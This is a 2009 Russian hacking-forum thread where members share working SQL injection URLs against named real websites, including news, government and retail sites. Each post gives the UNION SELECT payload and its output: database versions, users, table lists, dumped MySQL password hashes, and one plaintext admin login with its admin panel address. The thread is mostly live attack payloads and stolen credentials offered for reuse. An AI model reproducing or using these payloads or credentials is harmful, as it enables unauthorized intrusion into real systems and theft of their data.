06.02.2009, 21:25
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Код:
http://www.rtos.com/page/product.php?id=-6+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4--
version(): 4.1.20-log
user(): expresslogic@216.119.112.142
database(): expresslogic
ТИЦ = 30
Код:
http://nlsod.ru/?d=o_company&f=company&id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),user+from+mysql.user+limit+0,1--
version(): 5.0.33
user(): root@localhost
database(): 1gb_nlsoddb
ТИЦ = 30
Код:
http://www.svadbaexpo.ru/index.php?id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--
version(): 4.1.20-log
user(): dbu_tours_1@192.168.5.21
database(): db_tours_3
ТИЦ = 100 |
|
|
06.02.2009, 21:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Software shop...
http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,ver sion(),database(),user()),43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*
Database Version: 4.0.20
Database name: piatadesoft
User name: root@localhost
http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,use r,password),43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61+FROM+mysql.user/*
root:6ac227d531f5e2da
|
|
|
|
06.02.2009, 23:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Электронная библиотека.
Код:
http://kamonline.ru/index.php?action=viewcat&num=-1+union+select+concat(login,0x3a,passwd)+from+users--
mailbrush,
Не понял, это таже самая инъекция, зачем её баянить?
Последний раз редактировалось R1dex; 07.02.2009 в 01:20..
|
|
|
|
07.02.2009, 08:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Медиа-уроки
Код:
http://media-lessons.com/video/-148+union+select+1,2,3,4,5,6,7+from+phpbb_users--
|
|
|
|
07.02.2009, 10:27
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
www.jvc.ro PR5
http://www.jvc.ro/product.php?id=EX-A10E&catid=100030[SQLINJ]
Version : PostgreSQL
Current_database : jvc-ro
Current_user: ppo
З.Ы. Уязвимы все сайты JVC в мире, сделаны они по одной и той же технологии только имена доменов разные и язык на котором предоставлена информация.
Скуля слепая... не раскручивал, кому интересно могу помочь
Последний раз редактировалось Gorev; 07.02.2009 в 10:31..
|
|
|
|
07.02.2009, 11:19
|
|
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572
Репутация:
34
|
|
apps.detnews.com
Pr 6
Код HTML:
http://apps.detnews.com/apps/history/index.php?id=-14+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,0,1,2,3,4+from+mysql.user
root:41221e5672a06384
johnd:2dd99728002374de
tdn:41221c6172a0658f
tdn:134e3e414b6b964f
jdaven:2dd99728002374de
ien:475dc867159e96ef
drupal_user:79bd7cfe7e82fdf1
|
|
|
|
07.02.2009, 11:27
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.aectra.ro/product.php?prod_id=-186+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT_WS(0x3a,Version(),Database(),User()),0x71),0 x71),6,7,8,9,10,11,12,13/*
Database Version: 4.1.11-Debian_4sarge7-log
Database name: aectra
User name: aectra@localhost
|
|
|
|
07.02.2009, 19:07
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
wap.116.ru
http://wap.116.ru/mobile/mobile.php?cmd=listbr&target=0&sost=-1'+group+by+1+union+select+1,concat_ws(0x3a,versio n(),database(),user())+--+
юзер - wap_116@10.80.12.52
бд - wap_116
версия MySQL - 5.0.51b-log
www.heaven-house.kz
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10,11,12,13,14,15,16,17+--+
юзер - u51572@10.10.223.216
бд - u51572
версия MySQL - 5.0.67-log
выводятся все таблицы сразу, limit даже не нужен)
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+information_schema.tables+--+
www.oprf.ru - ОБЩЕСТВЕННАЯ ПАЛАТА РФ=) Не думал что на таких сайтах могут быть уязвимости=)
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8+--+
юзер - oprf@localhost
бд - oprf
версия MySQL - 5.0.45
выводим список всех админов с пассами)
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,group_concat(pwd,0x3a,log in),6,7,8+from+users+--+
логин главного админа - root пароль - abra
админка - http://www.oprf.ru/admin/
p.s Не злоупотреблять=)
jokester: я так и буду твои посты объединять?
Последний раз редактировалось jokester; 07.02.2009 в 21:09..
|
|
|
|
07.02.2009, 23:30
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
http://www.defineyourgod.com/god.php?id=69+union+select+1,version(),3,4,5,6,7,8,9,10,11--
5.0.51a-15
Код:
http://www.defineyourgod.com/god.php?id=69+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1--
|
|
|
|
07.02.2009, 23:46
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.solaren.ro/product.php?id=2§ionID=57+UNION+SELECT+1,2,3,4 ,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Ve rsion(),Database(),User()),0x71),0x71)+LIMIT+1,1--
Database Version: 5.0.67-community
Database name: solarenr_1
User name: solarenr_1@localhost
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
